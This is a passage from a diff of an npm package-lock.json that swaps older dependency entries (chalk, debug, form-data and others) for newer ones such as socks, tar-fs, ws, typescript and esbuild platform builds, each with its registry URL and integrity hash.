"https://opencollective.com/browserslist" + "node": ">= 6.0.0", + "npm": ">= 3.0.0" } }, - "node_modules/caseless": { - "version": "0.12.0", - "resolved": "https://registry.npmjs.org/caseless/-/caseless-0.12.0.tgz", - "integrity": "sha1-G2gcIf+EAzyCZUMJBolCDRhxUdw=" - }, - "node_modules/chalk": { - "version": "4.1.2", - "resolved": "https://registry.npmjs.org/chalk/-/chalk-4.1.2.tgz", - "integrity": "sha512-oKnbhFyRIXpUuez8iBMmyEa4nbj4IOQyuhc/wy9kY7/WVPcwIO9VA668Pu8RkO7+0G76SLROeyw9CpQ061i4mA==", + "node_modules/socks": { + "version": "2.8.5", + "resolved": "https://registry.npmjs.org/socks/-/socks-2.8.5.tgz", + "integrity": "sha512-iF+tNDQla22geJdTyJB1wM/qrX9DMRwWrciEPwWLPRWAUEM8sQiyxgckLxWT1f7+9VabJS0jTGGr4QgBuvi6Ww==", "dev": true, + "license": "MIT", "dependencies": { - "ansi-styles": "^4.1.0", - "supports-color": "^7.1.0" + "ip-address": "^9.0.5", + "smart-buffer": "^4.2.0" }, "engines": { - "node": ">=10" - }, - "funding": { - "url": "https://github.com/chalk/chalk?sponsor=1" + "node": ">= 10.0.0", + "npm": ">= 3.0.0" } }, - "node_modules/char-regex": { - "version": "1.0.2", - "resolved": "https://registry.npmjs.org/char-regex/-/char-regex-1.0.2.tgz", - "integrity": "sha512-kWWXztvZ5SBQV+eRgKFeh8q5sLuZY2+8WUIzlxWVTg+oGwY14qylx1KbKzHd8P6ZYkAg0xyIDU9JMHhyJMZ1jw==", + "node_modules/socks-proxy-agent": { + "version": "8.0.5", + "resolved": "https://registry.npmjs.org/socks-proxy-agent/-/socks-proxy-agent-8.0.5.tgz", + "integrity": "sha512-HehCEsotFqbPW9sJ8WVYB6UbmIMv7kUUORIF2Nncq4VQvBfNBLibW9YZR5dlYCSUhwcD628pRllm7n+E+YTzJw==", "dev": true, + "license": "MIT", + "dependencies": { + "agent-base": "^7.1.2", + "debug": "^4.3.4", + "socks": "^2.8.3" + }, "engines": { - "node": ">=10" - } - }, - "node_modules/chownr": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/chownr/-/chownr-2.0.0.tgz", - "integrity": "sha512-bIomtDF5KGpdogkLd9VspvFzk9KfpyyGlS8YFVZl7TGPBHL5snIOnxeshwVgPteQ9b4Eydl+pVbIyE1DcvCWgQ==", - "engines": { - "node": ">=10" + "node": ">= 14" } }, - "node_modules/ci-info": { - "version": "3.2.0", - "resolved": "https://registry.npmjs.org/ci-info/-/ci-info-3.2.0.tgz", - "integrity": "sha512-dVqRX7fLUm8J6FgHJ418XuIgDLZDkYcDFTeL6TA2gt5WlIZUQrrH6EZrNClwT/H0FateUsZkGIOPRrLbP+PR9A==", - "dev": true - }, - "node_modules/cjs-module-lexer": { - "version": "1.2.2", - "resolved": "https://registry.npmjs.org/cjs-module-lexer/-/cjs-module-lexer-1.2.2.tgz", - "integrity": "sha512-cOU9usZw8/dXIXKtwa8pM0OTJQuJkxMN6w30csNRUerHfeQ5R6U3kkU/FtJeIf3M202OHfY2U8ccInBG7/xogA==", - "dev": true - }, - "node_modules/cliui": { - "version": "8.0.1", - "resolved": "https://registry.npmjs.org/cliui/-/cliui-8.0.1.tgz", - "integrity": "sha512-BSeNnyus75C4//NQ9gQt1/csTXyo/8Sb+afLAkzAptFuMsod9HFokGNudZpi/oQV73hnVK+sR+5PVRMd+Dr7YQ==", + "node_modules/stack-utils": { + "version": "2.0.6", + "resolved": "https://registry.npmjs.org/stack-utils/-/stack-utils-2.0.6.tgz", + "integrity": "sha512-XlkWvfIm6RmsWtNJx+uqtKLS8eqFbxUg0ZzLXqY0caEy9l7hruX8IpiDnjsLavoBgqCCR71TqWO8MaXYheJ3RQ==", "dev": true, "dependencies": { - "string-width": "^4.2.0", - "strip-ansi": "^6.0.1", - "wrap-ansi": "^7.0.0" + "escape-string-regexp": "^2.0.0" }, "engines": { - "node": ">=12" + "node": ">=10" } }, - "node_modules/co": { - "version": "4.6.0", - "resolved": "https://registry.npmjs.org/co/-/co-4.6.0.tgz", - "integrity": "sha512-QVb0dM5HvG+uaxitm8wONl7jltx8dqhfU33DcqtOZcLSVIKSDDLDi7+0LbAKiyI8hD9u42m2YxXSkMGWThaecQ==", + "node_modules/stream-buffers": { + "version": "3.0.2", + "resolved": "https://registry.npmjs.org/stream-buffers/-/stream-buffers-3.0.2.tgz", + "integrity": "sha512-DQi1h8VEBA/lURbSwFtEHnSTb9s2/pwLEaFuNhXwy1Dx3Sa0lOuYT2yNUr4/j2fs8oCAMANtrZ5OrPZtyVs3MQ==", "dev": true, "engines": { - "iojs": ">= 1.0.0", - "node": ">= 0.12.0" + "node": ">= 0.10.0" } }, - "node_modules/collect-v8-coverage": { - "version": "1.0.1", - "resolved": "https://registry.npmjs.org/collect-v8-coverage/-/collect-v8-coverage-1.0.1.tgz", - "integrity": "sha512-iBPtljfCNcTKNAto0KEtDfZ3qzjJvqE3aTGZsbhjSBlorqpXJlaWWtPO35D+ZImoC3KWejX64o+yPGxhWSTzfg==", - "dev": true - }, - "node_modules/color-convert": { - "version": "2.0.1", - "resolved": "https://registry.npmjs.org/color-convert/-/color-convert-2.0.1.tgz", - "integrity": "sha512-RRECPsj7iu/xb5oKYcsFHSppFNnsj/52OVTRKb4zP5onXwVF3zVmmToNcOfGC+CRDpfK/U584fMg38ZHCaElKQ==", + "node_modules/streamx": { + "version": "2.22.1", + "resolved": "https://registry.npmjs.org/streamx/-/streamx-2.22.1.tgz", + "integrity": "sha512-znKXEBxfatz2GBNK02kRnCXjV+AA4kjZIUxeWSr3UGirZMJfTE9uiwKHobnbgxWyL/JWro8tTq+vOqAK1/qbSA==", "dev": true, + "license": "MIT", "dependencies": { - "color-name": "~1.1.4" + "fast-fifo": "^1.3.2", + "text-decoder": "^1.1.0" }, - "engines": { - "node": ">=7.0.0" + "optionalDependencies": { + "bare-events": "^2.2.0" } }, - "node_modules/color-name": { - "version": "1.1.4", - "resolved": "https://registry.npmjs.org/color-name/-/color-name-1.1.4.tgz", - "integrity": "sha512-dOy+3AuW3a2wNbZHIuMZpTcgjGuLU/uBL/ubcZF9OXbDo8ff4O8yVp5Bf0efS8uEoYo5q4Fx7dY9OgQGXgAsQA==", - "dev": true - }, - "node_modules/colorette": { - "version": "1.3.0", - "resolved": "https://registry.npmjs.org/colorette/-/colorette-1.3.0.tgz", - "integrity": "sha512-ecORCqbSFP7Wm8Y6lyqMJjexBQqXSF7SSeaTyGGphogUjBlFP9m9o08wy86HL2uB7fMTxtOUzLMk7ogKcxMg1w==", - "dev": true - }, - "node_modules/combined-stream": { - "version": "1.0.8", - "resolved": "https://registry.npmjs.org/combined-stream/-/combined-stream-1.0.8.tgz", - "integrity": "sha512-FQN4MRfuJeHf7cBbBMJFXhKSDq+2kAArBlmRBvcvFE5BB1HZKXtSFASDhdlz9zOYwxh8lDdnvmMOe/+5cdoEdg==", + "node_modules/supports-color": { + "version": "7.2.0", + "resolved": "https://registry.npmjs.org/supports-color/-/supports-color-7.2.0.tgz", + "integrity": "sha512-qpCAvRl9stuOHveKsn7HncJRvv501qIacKzQlO/+Lwxc9+0q2wLyv4Dfvt80/DPn2pqOBsJdDiogXGR9+OvwRw==", + "dev": true, "dependencies": { - "delayed-stream": "~1.0.0" + "has-flag": "^4.0.0" }, "engines": { - "node": ">= 0.8" - } - }, - "node_modules/commander": { - "version": "5.1.0", - "resolved": "https://registry.npmjs.org/commander/-/commander-5.1.0.tgz", - "integrity": "sha512-P0CysNDQ7rtVw4QIQtm+MRxV66vKFSvlsQvGYXZWR3qFU0jlMKHZZZgw8e+8DSah4UDKMqnknRDQz+xuQXQ/Zg==", - "engines": { - "node": ">= 6" + "node": ">=8" } }, - "node_modules/concat-map": { - "version": "0.0.1", - "resolved": "https://registry.npmjs.org/concat-map/-/concat-map-0.0.1.tgz", - "integrity": "sha1-2Klr13/Wjfd5OnMDajug1UBdR3s=" - }, - "node_modules/convert-source-map": { - "version": "1.8.0", - "resolved": "https://registry.npmjs.org/convert-source-map/-/convert-source-map-1.8.0.tgz", - "integrity": "sha512-+OQdjP49zViI/6i7nIJpA8rAl4sV/JdPfU9nZs3VqOwGIgizICvuN2ru6fMd+4llL0tar18UYJXfZ/TWtmhUjA==", + "node_modules/tar-fs": { + "version": "3.1.0", + "resolved": "https://registry.npmjs.org/tar-fs/-/tar-fs-3.1.0.tgz", + "integrity": "sha512-5Mty5y/sOF1YWj1J6GiBodjlDc05CUR8PKXrsnFAiSG0xA+GHeWLovaZPYUDXkH/1iKRf2+M5+OrRgzC7O9b7w==", "dev": true, + "license": "MIT", "dependencies": { - "safe-buffer": "~5.1.1" + "pump": "^3.0.0", + "tar-stream": "^3.1.5" + }, + "optionalDependencies": { + "bare-fs": "^4.0.1", + "bare-path": "^3.0.0" } }, - "node_modules/core-util-is": { - "version": "1.0.2", - "resolved": "https://registry.npmjs.org/core-util-is/-/core-util-is-1.0.2.tgz", - "integrity": "sha1-tf1UIgqivFq1eqtxQMlAdUUDwac=" - }, - "node_modules/cross-spawn": { - "version": "7.0.3", - "resolved": "https://registry.npmjs.org/cross-spawn/-/cross-spawn-7.0.3.tgz", - "integrity": "sha512-iRDPJKUPVEND7dHPO8rkbOnPpyDygcDFtWjpeWNCgy8WP2rXcxXL8TskReQl6OrB2G7+UJrags1q15Fudc7G6w==", + "node_modules/tar-stream": { + "version": "3.1.7", + "resolved": "https://registry.npmjs.org/tar-stream/-/tar-stream-3.1.7.tgz", + "integrity": "sha512-qJj60CXt7IU1Ffyc3NJMjh6EkuCFej46zUqJ4J7pqYlThyd9bO0XBTmcOIhSzZJVWfsLks0+nle/j538YAW9RQ==", "dev": true, + "license": "MIT", "dependencies": { - "path-key": "^3.1.0", - "shebang-command": "^2.0.0", - "which": "^2.0.1" - }, - "engines": { - "node": ">= 8" + "b4a": "^1.6.4", + "fast-fifo": "^1.2.0", + "streamx": "^2.15.0" } }, - "node_modules/dashdash": { - "version": "1.14.1", - "resolved": "https://registry.npmjs.org/dashdash/-/dashdash-1.14.1.tgz", - "integrity": "sha1-hTz6D3y+L+1d4gMmuN1YEDX24vA=", + "node_modules/text-decoder": { + "version": "1.2.3", + "resolved": "https://registry.npmjs.org/text-decoder/-/text-decoder-1.2.3.tgz", + "integrity": "sha512-3/o9z3X0X0fTupwsYvR03pJ/DjWuqqrfwBgTQzdWDiQSm9KitAyz/9WqsT2JQW7KV2m+bC2ol/zqpW37NHxLaA==", + "dev": true, + "license": "Apache-2.0", "dependencies": { - "assert-plus": "^1.0.0" - }, - "engines": { - "node": ">=0.10" + "b4a": "^1.6.4" } }, - "node_modules/debug": { - "version": "4.3.2", - "resolved": "https://registry.npmjs.org/debug/-/debug-4.3.2.tgz", - "integrity": "sha512-mOp8wKcvj7XxC78zLgw/ZA+6TSgkoE2C/ienthhRD298T7UNwAg9diBpLRxC0mOezLl4B0xV7M0cCO6P/O0Xhw==", + "node_modules/to-regex-range": { + "version": "5.0.1", + "resolved": "https://registry.npmjs.org/to-regex-range/-/to-regex-range-5.0.1.tgz", + "integrity": "sha512-65P7iz6X5yEr1cwcgvQxbbIw7Uk3gOy5dIdtZ4rDveLqhrdJP+Li/Hx6tyK0NEb+2GCyneCMJiGqrADCSNk8sQ==", "dev": true, "dependencies": { - "ms": "2.1.2" + "is-number": "^7.0.0" }, "engines": { - "node": ">=6.0" - }, - "peerDependenciesMeta": { - "supports-color": { - "optional": true - } + "node": ">=8.0" } }, - "node_modules/dedent": { - "version": "0.7.0", - "resolved": "https://registry.npmjs.org/dedent/-/dedent-0.7.0.tgz", - "integrity": "sha512-Q6fKUPqnAHAyhiUgFU7BUzLiv0kd8saH9al7tnu5Q/okj6dnupxyTgFIBjVzJATdfIAm9NAsvXNzjaKa+bxVyA==", - "dev": true + "node_modules/tr46": { + "version": "0.0.3", + "resolved": "https://registry.npmjs.org/tr46/-/tr46-0.0.3.tgz", + "integrity": "sha512-N3WMsuqV66lT30CrXNbEjx4GEwlow3v6rr4mCcv6prnfwhS01rkgyFdjPNBYd9br7LpXV1+Emh01fHnq2Gdgrw==", + "dev": true, + "license": "MIT" }, - "node_modules/deepmerge": { - "version": "4.3.0", - "resolved": "https://registry.npmjs.org/deepmerge/-/deepmerge-4.3.0.tgz", - "integrity": "sha512-z2wJZXrmeHdvYJp/Ux55wIjqo81G5Bp4c+oELTW+7ar6SogWHajt5a9gO3s3IDaGSAXjDk0vlQKN3rms8ab3og==", + "node_modules/typescript": { + "version": "5.8.3", + "resolved": "https://registry.npmjs.org/typescript/-/typescript-5.8.3.tgz", + "integrity": "sha512-p1diW6TqL9L07nNxvRMM7hMMw4c5XOo/1ibL4aAIGmSAt9slTE1Xgw5KWuof2uTOvCg9BY7ZRi+GaF+7sfgPeQ==", "dev": true, + "license": "Apache-2.0", + "bin": { + "tsc": "bin/tsc", + "tsserver": "bin/tsserver" + }, "engines": { - "node": ">=0.10.0" + "node": ">=14.17" } }, - "node_modules/delayed-stream": { - "version": "1.0.0", - "resolved": "https://registry.npmjs.org/delayed-stream/-/delayed-stream-1.0.0.tgz", - "integrity": "sha1-3zrhmayt+31ECqrgsp4icrJOxhk=", - "engines": { - "node": ">=0.4.0" - } + "node_modules/undici-types": { + "version": "6.21.0", + "resolved": "https://registry.npmjs.org/undici-types/-/undici-types-6.21.0.tgz", + "integrity": "sha512-iwDZqg0QAGrg9Rav5H4n0M64c3mkR59cJ6wQp+7C4nI0gsmExaedaYLNO44eT4AtBBwjbTiGPMlt2Md0T9H9JQ==", + "dev": true, + "license": "MIT" }, - "node_modules/detect-newline": { - "version": "3.1.0", - "resolved": "https://registry.npmjs.org/detect-newline/-/detect-newline-3.1.0.tgz", - "integrity": "sha512-TLz+x/vEXm/Y7P7wn1EJFNLxYpUD4TgMosxY6fAVJUnJMbupHBOncxyWUG9OpTaH9EBD7uFI5LfEgmMOc54DsA==", + "node_modules/webidl-conversions": { + "version": "3.0.1", + "resolved": "https://registry.npmjs.org/webidl-conversions/-/webidl-conversions-3.0.1.tgz", + "integrity": "sha512-2JAn3z8AR6rjK8Sm8orRC0h/bcl/DqL7tRPdGZ4I1CjdF+EaMLmYxBHyXuKL849eucPFhvBoxMsflfOb8kxaeQ==", "dev": true, - "engines": { - "node": ">=8" - } + "license": "BSD-2-Clause" }, - "node_modules/ecc-jsbn": { - "version": "0.1.2", - "resolved": "https://registry.npmjs.org/ecc-jsbn/-/ecc-jsbn-0.1.2.tgz", - "integrity": "sha1-OoOpBOVDUyh4dMVkt1SThoSamMk=", + "node_modules/whatwg-url": { + "version": "5.0.0", + "resolved": "https://registry.npmjs.org/whatwg-url/-/whatwg-url-5.0.0.tgz", + "integrity": "sha512-saE57nupxk6v3HY35+jzBwYa0rKSy0XR8JSxZPwgLr7ys0IBzhGviA1/TUGJLmSVqs8pb9AnvICXEuOHLprYTw==", + "dev": true, + "license": "MIT", "dependencies": { - "jsbn": "~0.1.0", - "safer-buffer": "^2.1.0" + "tr46": "~0.0.3", + "webidl-conversions": "^3.0.0" } }, - "node_modules/electron-to-chromium": { - "version": "1.3.803", - "resolved": "https://registry.npmjs.org/electron-to-chromium/-/electron-to-chromium-1.3.803.tgz", - "integrity": "sha512-tmRK9qB8Zs8eLMtTBp+w2zVS9MUe62gQQQHjYdAc5Zljam3ZIokNb+vZLPRz9RCREp6EFRwyhOFwbt1fEriQ2Q==", + "node_modules/wrappy": { + "version": "1.0.2", + "resolved": "https://registry.npmjs.org/wrappy/-/wrappy-1.0.2.tgz", + "integrity": "sha1-tSQ9jz7BqjXxNkYFvA0QNuMKtp8=", "dev": true }, - "node_modules/emittery": { - "version": "0.13.1", - "resolved": "https://registry.npmjs.org/emittery/-/emittery-0.13.1.tgz", - "integrity": "sha512-DeWwawk6r5yR9jFgnDKYt4sLS0LmHJJi3ZOnb5/JdbYwj3nW+FxQnHIjhBKz8YLC7oRNPVM9NQ47I3CVx34eqQ==", + "node_modules/ws": { + "version": "8.18.3", + "resolved": "https://registry.npmjs.org/ws/-/ws-8.18.3.tgz", + "integrity": "sha512-PEIGCY5tSlUt50cqyMXfCzX+oOPqN0vuGqWzbcJ2xvnkzkq46oOpz7dQaTDBdfICb4N14+GARUDw2XV2N4tvzg==", "dev": true, + "license": "MIT", "engines": { - "node": ">=12" + "node": ">=10.0.0" }, - "funding": { - "url": "https://github.com/sindresorhus/emittery?sponsor=1" - } - }, - "node_modules/emoji-regex": { - "version": "8.0.0", - "resolved": "https://registry.npmjs.org/emoji-regex/-/emoji-regex-8.0.0.tgz", - "integrity": "sha512-MSjYzcWNOA0ewAHpz0MxpYFvwg6yjy1NG3xteoqz644VCo/RPgnr1/GGt+ic3iJTzQ8Eu3TdM14SawnVUmGE6A==", - "dev": true - }, - "node_modules/error-ex": { - "version": "1.3.2", - "resolved": "https://registry.npmjs.org/error-ex/-/error-ex-1.3.2.tgz", - "integrity": "sha512-7dFHNmqeFSEt2ZBsCriorKnn3Z2pj+fd9kmI6QoWw4//DL+icEBfc0U7qJCisqrTsKTjw4fNFy2pW9OqStD84g==", - "dev": true, - "dependencies": { - "is-arrayish": "^0.2.1" + "peerDependencies": { + "bufferutil": "^4.0.1", + "utf-8-validate": ">=5.0.2" + }, + "peerDependenciesMeta": { + "bufferutil": { + "optional": true + }, + "utf-8-validate": { + "optional": true + } } - }, - "node_modules/escalade": { - "version": "3.1.1", - "resolved": "https://registry.npmjs.org/escalade/-/escalade-3.1.1.tgz", - "integrity": "sha512-k0er2gUkLf8O0zKJiAhmkTnJlTvINGv7ygDNPbeIsX/TJjGJZHuh9B2UxbsaEkmlEo9MfhrSzmhIlhRlI2GXnw==", + } + }, + "dependencies": { + "@babel/code-frame": { + "version": "7.27.1", + "resolved": "https://registry.npmjs.org/@babel/code-frame/-/code-frame-7.27.1.tgz", + "integrity": "sha512-cjQ7ZlQ0Mv3b47hABuTevyTuYN4i+loJKGeV9flcCgIK37cCXRh+L1bd3iBHlynerhQ7BhCkn2BPbQUL+rGqFg==", "dev": true, - "engines": { - "node": ">=6" + "requires": { + "@babel/helper-validator-identifier": "^7.27.1", + "js-tokens": "^4.0.0", + "picocolors": "^1.1.1" } }, - "node_modules/escape-string-regexp": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/escape-string-regexp/-/escape-string-regexp-2.0.0.tgz", - "integrity": "sha512-UpzcLCXolUWcNu5HtVMHYdXJjArjsF9C0aNnquZYY4uW/Vu0miy5YoWvbV345HauVvcAUnpRuhMMcqTcGOY2+w==", - "dev": true, - "engines": { - "node": ">=8" - } + "@babel/helper-validator-identifier": { + "version": "7.27.1", + "resolved": "https://registry.npmjs.org/@babel/helper-validator-identifier/-/helper-validator-identifier-7.27.1.tgz", + "integrity": "sha512-D2hP9eA+Sqx1kBZgzxZh0y1trbuU+JoDkiEwqhQ36nodYqJwyEIhPSdMNd7lOm/4io72luTPWH20Yda0xOuUow==", + "dev": true }, - "node_modules/esprima": { - "version": "4.0.1", - "resolved": "https://registry.npmjs.org/esprima/-/esprima-4.0.1.tgz", - "integrity": "sha512-eGuFFw7Upda+g4p+QHvnW0RyTX/SVeJBDM/gCtMARO0cLuT2HcEKnTPvhjV6aGeqrCB/sbNop0Kszm0jsaWU4A==", + "@esbuild/aix-ppc64": { + "version": "0.25.6", + "resolved": "https://registry.npmjs.org/@esbuild/aix-ppc64/-/aix-ppc64-0.25.6.tgz", + "integrity": "sha512-ShbM/3XxwuxjFiuVBHA+d3j5dyac0aEVVq1oluIDf71hUw0aRF59dV/efUsIwFnR6m8JNM2FjZOzmaZ8yG61kw==", "dev": true, - "bin": { - "esparse": "bin/esparse.js", - "esvalidate": "bin/esvalidate.js" - }, - "engines": { - "node": ">=4" - } + "optional": true }, - "node_modules/execa": { - "version": "5.0.0", - "resolved": "https://registry.npmjs.org/execa/-/execa-5.0.0.tgz", - "integrity": "sha512-ov6w/2LCiuyO4RLYGdpFGjkcs0wMTgGE8PrkTHikeUy5iJekXyPIKUjifk5CsE0pt7sMCrMZ3YNqoCj6idQOnQ==", + "@esbuild/android-arm": { + "version": "0.25.6", + "resolved": "https://registry.npmjs.org/@esbuild/android-arm/-/android-arm-0.25.6.tgz", + "integrity": "sha512-S8ToEOVfg++AU/bHwdksHNnyLyVM+eMVAOf6yRKFitnwnbwwPNqKr3srzFRe7nzV69RQKb5DgchIX5pt3L53xg==", "dev": true, - "dependencies": { - "cross-spawn": "^7.0.3", - "get-stream": "^6.0.0", - "human-signals": "^2.1.0", - "is-stream": "^2.0.0", - "merge-stream": "^2.0.0", - "npm-run-path": "^4.0.1", - "onetime": "^5.1.2", - "signal-exit": "^3.0.3", - "strip-final-newline": "^2.0.0" - }, - "engines": { - "node": ">=10" - }, - "funding": { - "url": "https://github.com/sindresorhus/execa?sponsor=1" - } + "optional": true }, - "node_modules/exit": { - "version": "0.1.2", - "resolved": "https://registry.npmjs.org/exit/-/exit-0.1.2.tgz", - "integrity": "sha512-Zk/eNKV2zbjpKzrsQ+n1G6poVbErQxJ0LBOJXaKZ1EViLzH+hrLu9cdXI4zw9dBQJslwBEpbQ2P1oS7nDxs6jQ==", + "@esbuild/android-arm64": { + "version": "0.25.6", + "resolved": "https://registry.npmjs.org/@esbuild/android-arm64/-/android-arm64-0.25.6.tgz", + "integrity": "sha512-hd5zdUarsK6strW+3Wxi5qWws+rJhCCbMiC9QZyzoxfk5uHRIE8T287giQxzVpEvCwuJ9Qjg6bEjcRJcgfLqoA==", "dev": true, - "engines": { - "node": ">= 0.8.0" - } + "optional": true }, - "node_modules/expect": { - "version": "29.4.1", - "resolved": "https://registry.npmjs.org/expect/-/expect-29.4.1.tgz", - "integrity": "sha512-OKrGESHOaMxK3b6zxIq9SOW8kEXztKff/Dvg88j4xIJxur1hspEbedVkR3GpHe5LO+WB2Qw7OWN0RMTdp6as5A==", + "@esbuild/android-x64": { + "version": "0.25.6", + "resolved": "https://registry.npmjs.org/@esbuild/android-x64/-/android-x64-0.25.6.tgz", + "integrity": "sha512-0Z7KpHSr3VBIO9A/1wcT3NTy7EB4oNC4upJ5ye3R7taCc2GUdeynSLArnon5G8scPwaU866d3H4BCrE5xLW25A==", "dev": true, - "dependencies": { - "@jest/expect-utils": "^29.4.1", - "jest-get-type": "^29.2.0", - "jest-matcher-utils": "^29.4.1", - "jest-message-util": "^29.4.1", - "jest-util": "^29.4.1" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } + "optional": true }, - "node_modules/expect/node_modules/jest-get-type": { - "version": "29.2.0", - "resolved": "https://registry.npmjs.org/jest-get-type/-/jest-get-type-29.2.0.tgz", - "integrity": "sha512-uXNJlg8hKFEnDgFsrCjznB+sTxdkuqiCL6zMgA75qEbAJjJYTs9XPrvDctrEig2GDow22T/LvHgO57iJhXB/UA==", + "@esbuild/darwin-arm64": { + "version": "0.25.6", + "resolved": "https://registry.npmjs.org/@esbuild/darwin-arm64/-/darwin-arm64-0.25.6.tgz", + "integrity": "sha512-FFCssz3XBavjxcFxKsGy2DYK5VSvJqa6y5HXljKzhRZ87LvEi13brPrf/wdyl/BbpbMKJNOr1Sd0jtW4Ge1pAA==", "dev": true, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/extend": { - "version": "3.0.2", - "resolved": "https://registry.npmjs.org/extend/-/extend-3.0.2.tgz", - "integrity": "sha512-fjquC59cD7CyW6urNXK0FBufkZcoiGG80wTuPujX590cB5Ttln20E2UB4S/WARVqhXffZl2LNgS+gQdPIIim/g==" - }, - "node_modules/extsprintf": { - "version": "1.3.0", - "resolved": "https://registry.npmjs.org/extsprintf/-/extsprintf-1.3.0.tgz", - "integrity": "sha1-lpGEQOMEGnpBT4xS48V06zw+HgU=", - "engines": [ - "node >=0.6.0" - ] - }, - "node_modules/fast-deep-equal": { - "version": "3.1.3", - "resolved": "https://registry.npmjs.org/fast-deep-equal/-/fast-deep-equal-3.1.3.tgz", - "integrity": "sha512-f3qQ9oQy9j2AhBe/H9VC91wLmKBCCU/gDOnKNAYG5hswO7BLKj09Hc5HYNz9cGI++xlpDCIgDaitVs03ATR84Q==" - }, - "node_modules/fast-json-stable-stringify": { - "version": "2.1.0", - "resolved": "https://registry.npmjs.org/fast-json-stable-stringify/-/fast-json-stable-stringify-2.1.0.tgz", - "integrity": "sha512-lhd/wF+Lk98HZoTCtlVraHtfh5XYijIjalXck7saUtuanSDyLMxnHhSXEDJqHxD7msR8D0uCmqlkwjCV8xvwHw==" + "optional": true }, - "node_modules/fb-watchman": { - "version": "2.0.1", - "resolved": "https://registry.npmjs.org/fb-watchman/-/fb-watchman-2.0.1.tgz", - "integrity": "sha512-DkPJKQeY6kKwmuMretBhr7G6Vodr7bFwDYTXIkfG1gjvNpaxBTQV3PbXg6bR1c1UP4jPOX0jHUbbHANL9vRjVg==", + "@esbuild/darwin-x64": { + "version": "0.25.6", + "resolved": "https://registry.npmjs.org/@esbuild/darwin-x64/-/darwin-x64-0.25.6.tgz", + "integrity": "sha512-GfXs5kry/TkGM2vKqK2oyiLFygJRqKVhawu3+DOCk7OxLy/6jYkWXhlHwOoTb0WqGnWGAS7sooxbZowy+pK9Yg==", "dev": true, - "dependencies": { - "bser": "2.1.1" - } + "optional": true }, - "node_modules/fill-range": { - "version": "7.1.1", - "resolved": "https://registry.npmjs.org/fill-range/-/fill-range-7.1.1.tgz", - "integrity": "sha512-YsGpe3WHLK8ZYi4tWDg2Jy3ebRz2rXowDxnld4bkQB00cc/1Zw9AWnC0i9ztDJitivtQvaI9KaLyKrc+hBW0yg==", + "@esbuild/freebsd-arm64": { + "version": "0.25.6", + "resolved": "https://registry.npmjs.org/@esbuild/freebsd-arm64/-/freebsd-arm64-0.25.6.tgz", + "integrity": "sha512-aoLF2c3OvDn2XDTRvn8hN6DRzVVpDlj2B/F66clWd/FHLiHaG3aVZjxQX2DYphA5y/evbdGvC6Us13tvyt4pWg==", "dev": true, - "dependencies": { - "to-regex-range": "^5.0.1" - }, - "engines": { - "node": ">=8" - } + "optional": true }, - "node_modules/find-up": { - "version": "4.1.0", - "resolved": "https://registry.npmjs.org/find-up/-/find-up-4.1.0.tgz", - "integrity": "sha512-PpOwAdQ/YlXQ2vj8a3h8IipDuYRi3wceVQQGYWxNINccq40Anw7BlsEXCMbt1Zt+OLA6Fq9suIpIWD0OsnISlw==", + "@esbuild/freebsd-x64": { + "version": "0.25.6", + "resolved": "https://registry.npmjs.org/@esbuild/freebsd-x64/-/freebsd-x64-0.25.6.tgz", + "integrity": "sha512-2SkqTjTSo2dYi/jzFbU9Plt1vk0+nNg8YC8rOXXea+iA3hfNJWebKYPs3xnOUf9+ZWhKAaxnQNUf2X9LOpeiMQ==", "dev": true, - "dependencies": { - "locate-path": "^5.0.0", - "path-exists": "^4.0.0" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/follow-redirects": { - "version": "1.15.6", - "resolved": "https://registry.npmjs.org/follow-redirects/-/follow-redirects-1.15.6.tgz", - "integrity": "sha512-wWN62YITEaOpSK584EZXJafH1AGpO8RVgElfkuXbTOrPX4fIfOyEpW/CsiNd8JdYrAoOvafRTOEnvsO++qCqFA==", - "funding": [ - { - "type": "individual", - "url": "https://github.com/sponsors/RubenVerborgh" - } - ], - "engines": { - "node": ">=4.0" - }, - "peerDependenciesMeta": { - "debug": { - "optional": true - } - } + "optional": true }, - "node_modules/forever-agent": { - "version": "0.6.1", - "resolved": "https://registry.npmjs.org/forever-agent/-/forever-agent-0.6.1.tgz", - "integrity": "sha1-+8cfDEGt6zf5bFd60e1C2P2sypE=", - "engines": { - "node": "*" - } + "@esbuild/linux-arm": { + "version": "0.25.6", + "resolved": "https://registry.npmjs.org/@esbuild/linux-arm/-/linux-arm-0.25.6.tgz", + "integrity": "sha512-SZHQlzvqv4Du5PrKE2faN0qlbsaW/3QQfUUc6yO2EjFcA83xnwm91UbEEVx4ApZ9Z5oG8Bxz4qPE+HFwtVcfyw==", + "dev": true, + "optional": true }, - "node_modules/form-data": { - "version": "2.5.1", - "resolved": "https://registry.npmjs.org/form-data/-/form-data-2.5.1.tgz", - "integrity": "sha512-m21N3WOmEEURgk6B9GLOE4RuWOFf28Lhh9qGYeNlGq4VDXUlJy2th2slBNU8Gp8EzloYZOibZJ7t5ecIrFSjVA==", - "dependencies": { - "asynckit": "^0.4.0", - "combined-stream": "^1.0.6", - "mime-types": "^2.1.12" - }, - "engines": { - "node": ">= 0.12" - } + "@esbuild/linux-arm64": { + "version": "0.25.6", + "resolved": "https://registry.npmjs.org/@esbuild/linux-arm64/-/linux-arm64-0.25.6.tgz", + "integrity": "sha512-b967hU0gqKd9Drsh/UuAm21Khpoh6mPBSgz8mKRq4P5mVK8bpA+hQzmm/ZwGVULSNBzKdZPQBRT3+WuVavcWsQ==", + "dev": true, + "optional": true }, - "node_modules/fs-minipass": { - "version": "2.1.0", - "resolved": "https://registry.npmjs.org/fs-minipass/-/fs-minipass-2.1.0.tgz", - "integrity": "sha512-V/JgOLFCS+R6Vcq0slCuaeWEdNC3ouDlJMNIsacH2VtALiu9mV4LPrHc5cDl8k5aw6J8jwgWWpiTo5RYhmIzvg==", - "dependencies": { - "minipass": "^3.0.0" - }, - "engines": { - "node": ">= 8" - } + "@esbuild/linux-ia32": { + "version": "0.25.6", + "resolved": "https://registry.npmjs.org/@esbuild/linux-ia32/-/linux-ia32-0.25.6.tgz", + "integrity": "sha512-aHWdQ2AAltRkLPOsKdi3xv0mZ8fUGPdlKEjIEhxCPm5yKEThcUjHpWB1idN74lfXGnZ5SULQSgtr5Qos5B0bPw==", + "dev": true, + "optional": true }, - "node_modules/fs.realpath": { - "version": "1.0.0", - 